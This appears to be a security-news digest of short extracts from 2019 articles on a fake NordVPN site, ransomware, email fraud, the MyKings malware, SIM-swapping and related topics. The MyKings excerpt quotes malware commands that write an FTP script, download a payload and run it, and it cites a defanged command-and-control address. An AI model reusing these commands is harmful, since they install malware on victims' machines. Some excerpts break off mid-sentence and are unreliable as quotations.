• Hackers Use Fake NordVPN Website to Deliver Banking Trojan
    While previously they hacked legitimate websites to hijack download links infected with malware, the hackers are now creating website clones to deliver banking Trojans onto unsuspecting victims' computers. "Using this malware, hackers can perform web injections, traffic intercepts, keylogging and steal information from different bank-client systems." The operators behind this malicious campaign have launched their attacks on August 8, they are focusing on English-speaking targets and, according to the researchers, thousands have already visited the nord-vpn[. However, he can make exceptions if the victim is valuable," Doctor Web malware analyst Ivan Korolev told BleepingComputer.  He also said that the hackers are using the malware "mainly as keylogger/traffic sniffer/backdoor" after successfully infecting their victims.Read More
  • Held hostage by ransomware? Here's how to respond
    No sector or organization is immune to ransomware - malicious software that holds data files hostage while hackers demand payment to restore access. Business systems owners have to decide between paying the ransom or recovering their systems on their own - and under time pressure, businesses are often tempted to pay the ransom. Last year a hospital in Indiana paid its ransom after realizing that while recovery was feasible, the costs, amount of effort, downtime and reputational damage involved in doing so would be too high. This year, following a ransomware attack, the US city of Baltimore estimated its recovery costs at more than $18 million - a much higher price than the $75,000 ransom, which the city opted to pay. Ensure that the organization’s cyber insurance covers ransomware attacks, and inform the insurance company as soon as an attack occurs.Read More
  • $11M Email Scam at Caterpillar Sales Office Pinned to Nigerian Man
    "Logs indicate that between April 6 and April 20, 2018, the intruder accessed the CFO's account at least 464 times, mostly from Internet Protocol (IP) addresses in Nigeria" reads the affidavit from an FBI agent. Tricks of the trade With this level of access, it is stated that Okeke used the CFO's account to send fraudulent wire transfer requests to members of the company's internal financial team. Some emails had fake invoices with Unatrac logos, while others had been sent to the CFO's account from an external email (pakfei.trade@gmail.com) and then forwarded to employees in charge of making payments, to create the appearance of a legitimate trail. Wrapping things up The FBI linked Okeke to this fraudulent activity starting from the email address 'iconoclastlast1960@gmail.com,' which received files from Unatrac's CFO OneDrive storage account. The breakthrough came from an FBI confidential source that linked 'iconoclastlast1960@gmail.com' malicious purposes.Read More
  • Uncovering a MyKings Variant With Bootloader Persistence via Managed Detection and Response
    Unlike infections that start with embedded URLs and files, MyKings is tied together by scripts that simply download everything it needs from remote servers. ]info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe”} Mysa1 rundll32.exe c:\\windows\\debug\\item.dat Mysa2 cmd /c echo open ftp[.]ftp0118[. The injected user-land code’s main role is to download a piece of code from its C&C server, whose address is obtained from hxxp[://]www[.]upme0611[.]info/address[.]txt. After connection with the C&C server is established, TestMsg.tmp, a shellcode executed by the injected process, is downloaded from one of the servers above. The summarized list of HTTP requests that the malware variant performed to obtain C&C server addresses and download other payloads is shown below: It then downloads kill.txt, a list of processes to be terminated before it finally obtains the list of files to download and execute from downs.txt:Read More
  • UK hacker-for-hire jailed for role in SIM-swapping attacks, data theft
    A British teenager has been sentenced to 20 months in prison after offering hacker-for-hire services to cash in on trends including SIM-swapping attacks. In April 2018, a routine visit was conducted to Gunton's home with respect to the Sexual Harm Prevention Order that was imposed in 2016 for past offenses. During the inspection, law enforcement found software which indicated the teenager may be involved in cybercrime, and the further investigation of a laptop belonging to Gunton and seized by police revealed that he had been offering himself as a provider of hacking services. This information, which could include personally identifiable information (PII) such as names, addresses, and online account details, could then be used to commit fraud and SIM-swapping attacks. It might only be a short window in which the victim does not realize their number has been transferred, but this time frame can be enough for an attacker to bypass two-factor authentication (2FA), intercept calls and text messages, request password resets, and compromise online accounts ranging from email addresses to cryptocurrency wallets.Read More
  • Organizations Expose Sensitive Data via Malware Analysis Sandboxes
    Researchers at UK-based threat intelligence firm Cyjax have studied files submitted to three popular online malware analysis sandboxes and found that many of the publicly accessible files contain sensitive information. The analysis was carried out over a period of three days last week and it covered three unnamed sandbox services that allow users to upload files to determine whether they are malicious or benign. Cyjax’s analysis focused on PDF documents and email files (.msg and .eml). The experts have also analyzed a URL scanning service over the 3-day period and found that many of the submitted URLs pointed to sensitive data hosted on services such as Google Drive and the file sharing service WeTransfer. Many providers require payment to submit files privately, meaning that everyone who uses the free service will have their files shared by default,” Cyjax explained. Related: Provider of Data Integration Services for Fortune 100 Firms Exposed Sensitive FilesRead More
  • Ransomware Gains Traction, UK BEC Fraud Spikes
    The latest news centers on Sodinokibi, a ransomware strain that has helped fraudsters make higher ransom demands. In the United Kingdom, the UK Finance Department announced that the UK’s Dedicated Card and Payment Crime Unit, which operates as a specialized police unit that is in turn backed by financial institutions, as reported by govtinfosecurity.com, has dismantled 13 organized crime groups through the first half of the year, a rate that more than doubles that which was seen in the previous year. As reported by the site, 39 fraudsters were convicted after investigations by the DCPCU, and they were sentenced to a combined total of more than 44 years of prison time. Fraud that was in turn prevented by the unit amounted to as much as $8.2 million in the first half of the year. Through the past 17 years, the unit has “disrupted” $732 million of fraud. According to the announcement detailing the indictment, Sponaugle allegedly used funds from the business’s bank account to pay corporate credit card bills associated with those personal purchases and hid her fraud by making false entries in the business’s financial accounting system.Read More
  • Software Vulnerability Disclosure Is a Real Mess
    The researchers filed the report with the Mitre Corp., a US government–funded research organization that tracks common vulnerabilities and exposures (CVEs). About the "security issue" on #VLC : VLC is not vulnerable. And in the case of the VLC vulnerability, most reporters published their stories without contacting the developers. "In the VLC security issue, the researcher asked [Mitre] for a CVE and got it at the number 9.8," he says, pointing out that the last Linux kernel vulnerability that allowed attackers to compromise the system just by sending a packet to a Linux server in the cloud did not get a 9.8 score. In the case of the VLC vulnerability report, the researchers conducted their experiments with an outdated version of the vulnerable library. "I would point out that Mitre didn't create this vulnerability report; the researcher did.Read More
  • IT threat evolution Q2 2019. Statistics
    * Unique users attacked by this malware as a percentage of all users of Kaspersky mobile solutions that were attacked by ransomware Trojans. * Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000) ** Unique users attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky mobile solutions in the country. Number of unique users attacked by financial malware, Q2 2019 (download) Attack geography To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products that faced this threat during the reporting period out of all users of our products in that country. Attack geography Geographical spread of countries by share of users attacked by ransomware Trojans, Q2 2019 (download) Top 10 countries attacked by ransomware Trojans ** Unique Kaspersky users attacked by a particular family of ransomware Trojans as a percentage of all users attacked by ransomware Trojans.Read More
  • Researchers discover flaws in software-based Router Network Isolation
    The study found multiple flaws in routers from TP-Link, D-Link, Edimax, and Belkin. The current technique discovered by the researchers allows for transfer of small amounts of data only.Read More